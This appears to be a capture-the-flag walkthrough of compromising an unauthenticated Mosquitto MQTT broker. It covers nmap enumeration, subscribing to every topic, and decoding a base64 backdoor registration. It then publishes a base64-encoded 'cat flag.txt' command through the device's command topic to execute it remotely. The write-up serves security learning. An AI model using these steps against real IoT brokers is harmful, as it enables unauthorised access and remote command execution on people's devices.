nmap
1
2
3
4
5
sudo nmap -p- 10.10.108.171 -vvvv -T4
sudo nmap -sC -sV -O -p1883 10.10.108.171
PORT STATE SERVICE VERSION
1883/tcp open mosquitto version 2.0.14
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
PORT STATE SERVICE REASON VERSION
1883/tcp open mosquitto version 2.0.14 syn-ack ttl 60
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/publish/bytes/sent: 1108
| $SYS/broker/load/sockets/1min: 1.67
| $SYS/broker/clients/connected: 2
| $SYS/broker/messages/stored: 38
| $SYS/broker/messages/received: 9063
| $SYS/broker/load/publish/sent/15min: 2.52
| $SYS/broker/load/bytes/sent/5min: 673.70
| $SYS/broker/load/publish/sent/1min: 33.81
| $SYS/broker/subscriptions/count: 5
| $SYS/broker/clients/active: 2
| $SYS/broker/clients/inactive: 1
| $SYS/broker/publish/bytes/received: 308061
| $SYS/broker/messages/sent: 9195
| $SYS/broker/clients/disconnected: 1
| $SYS/broker/load/bytes/sent/15min: 468.75
| $SYS/broker/clients/total: 3
| $SYS/broker/load/sockets/15min: 0.20
| $SYS/broker/publish/messages/sent: 134
| $SYS/broker/load/messages/received/1min: 93.65
| $SYS/broker/load/messages/received/15min: 90.34
| patio/lights: {"id":16405124934517910958,"color":"BLUE","status":"ON"}
| storage/thermostat: {"id":1632603447202492969,"temperature":23.995878}
| $SYS/broker/load/bytes/received/1min: 4335.15
| kitchen/toaster: {"id":11835886495264240745,"in_use":true,"temperature":152.60582,"toast_time":242}
| $SYS/broker/load/sockets/5min: 0.43
| $SYS/broker/bytes/received: 431139
| $SYS/broker/load/connections/5min: 0.44
| $SYS/broker/retained messages/count: 38
| frontdeck/camera: {"id":13258612146123966195,"yaxis":-46.27411,"xaxis":-28.1288,"zoom":2.6762495,"movement":true}
| $SYS/broker/load/publish/sent/5min: 7.27
| $SYS/broker/store/messages/count: 38
| $SYS/broker/load/messages/sent/1min: 127.46
| $SYS/broker/uptime: 6017 seconds
| $SYS/broker/load/bytes/received/15min: 4278.39
| $SYS/broker/load/messages/received/5min: 90.86
| livingroom/speaker: {"id":12708993900896013872,"gain":44}
| $SYS/broker/version: mosquitto version 2.0.14
| $SYS/broker/load/bytes/sent/1min: 1818.23
| $SYS/broker/clients/maximum: 3
| $SYS/broker/load/connections/1min: 1.83
| $SYS/broker/load/bytes/received/5min: 4280.56
| $SYS/broker/load/messages/sent/5min: 98.12
| $SYS/broker/bytes/sent: 42064
| $SYS/broker/store/messages/bytes: 279
| $SYS/broker/load/messages/sent/15min: 92.85
|_ $SYS/broker/load/connections/15min: 0.20
1883 - Pentesting MQTT
Mosquitto is a message broker that uses MQTT protocol to transfer messages between your toasters. JK, well not really, it transfers messages between its server and its IoT devices. We can connect to this using mosquitto and subscribe to recieve messages with mosquitto sub.
using mosquitto sub we can subscribe to any of the topics -t we found with the service scan and print the messages it recieves. We can also filter out messages with -T.
It’s recommended that you use TLS encrypted connections or else any messages you send/recieve are in plain text.
Capturing out request in wireshark we can see this isnt using an encrypted TLS connection.
We can capture ll comments with -t '#'
1
mosquitto_sub -h 10.10.108.171 -p 1883 -t '#'
1
2
3
{"id":6476193693900882290,"color":"RED","status":"OFF"}
eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==
{"id":9254039711038327212,"gain":49}
1
2
3
┌──(oskar㉿kali)-[~/Scripts/mqtt/python-mqtt-client-shell]
└─$ echo "eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==" | base64 -d
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","registered_commands":["HELP","CMD","SYS"],"pub_topic":"U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub","sub_topic":"XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"}
This base64 decoded: We can use the pub topic to open up a listener with mosquito sub:
mosquitto_sub -h 10.10.108.171 -p 1883 -t U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub- Send through a test with another terminal
mosquitto_pub -h 10.10.108.171 -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -m testand should recieve a response. - We get another base64 to decode that give suw what we need to continue. We can then encode another payload with base64:
echo '{"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d", "cmd": "CMD", "arg": "cat flag.txt"}' | base64 - and send this through to get our encoded flag:
mosquitto_pub -h 10.10.108.171 -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -m eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0K